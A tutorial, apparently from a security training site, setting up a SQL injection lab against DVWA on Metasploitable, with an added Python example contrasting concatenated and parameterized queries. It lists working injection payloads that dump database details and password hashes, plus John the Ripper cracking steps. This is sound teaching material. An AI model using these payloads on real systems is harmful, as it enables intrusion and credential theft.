September 6, 2016
SQL Injection Lab Part 1 – Lab Setup
Hello Cybrarians!
Welcome to: SQL injection lab PT.1 – Intro/Lab setup
In this lab, we'll begin a series on SQL injection. This will be a multi-part article/guide for learning SQL injection.
*Skill/Experience: Before proceeding with this series, you must know the basics of setting up VM environments.
- Let's start with the lab setup (this part explains how we will perform this lab and what we will deal with).
  - Kali Linux (or BT 5r3) VM and Metasploitable VM in NAT mode. (You must know this.)
  - Check the IP address of both devices.
- Open Kali Linux (or BT 5r3)
- Open your browser and type https://IP address of Metasploitable/dvwa/login.php
- Login with user name “admin” and password “password”
- Click on DVWA Security and set it to low then submit
- Click on manual SQL injection
- In the User ID box, type 1 and click Submit (PHP select statement: $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";)
- Next, enter: %' or '0'='0 (mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';)
- Get DB version: %' or 0=0 union select null, version()#
- Get DB user: %' or 0=0 union select null, user()#
- Get DB name: %' or 0=0 union select null, database()#
- Get schema information: %' and 1=0 union select null, table_name from information_schema.tables#
- Get the user tables from the schema information: %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
- Get all the column fields of the users table from information_schema: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users'#
- Let's get the password authentication hashes: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users#
- Now copy all the hashes into a text file in the following format, e.g. user:password
- Save it in /pentest/passwords/john as dvwa_password.txt
- Open a console and go to /pentest/passwords/john
- cd /pentest/passwords/john
- Now launch John the Ripper: ./john --format=raw-MD5 dvwa_password.txt and hit Enter.
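Why the %' or '0'='0 input in the User ID step returns every row, and how a bound parameter stops it. This is an added example, not part of the original lab or DVWA's own code. It assumes Python with an in-memory SQLite database standing in for DVWA's PHP/MySQL; the sample rows are constructed and the function names are hypothetical.

```python
import sqlite3

# Constructed sample rows; SQLite stands in for DVWA's MySQL database (assumption).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Pablo", "Picasso"),
]

# The tautology input from the User ID step above.
TAUTOLOGY = "%' or '0'='0"


def make_db():
    """Create an in-memory users table shaped like the one the lab queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users "
        "(user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_concatenated(conn, user_id):
    """Vulnerable form: input is pasted into the SQL text, as in the PHP statement."""
    query = (
        "SELECT first_name, last_name FROM users "
        "WHERE user_id = '" + user_id + "'"
    )
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, user_id):
    """Hardened form: input is bound as a value and never parsed as SQL."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for label, value in (("normal", "1"), ("tautology", TAUTOLOGY)):
        print(label, "concatenated  ->", lookup_concatenated(db, value))
        print(label, "parameterized ->", lookup_parameterized(db, value))
```

With the concatenated query the quote in the input closes the string literal, so the trailing or '0'='0' becomes part of the WHERE clause; with the bound parameter the same text is compared as a single value and matches nothing.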
OK Cybrarians, we'll continue this in the next part.
By: Bijay Acharya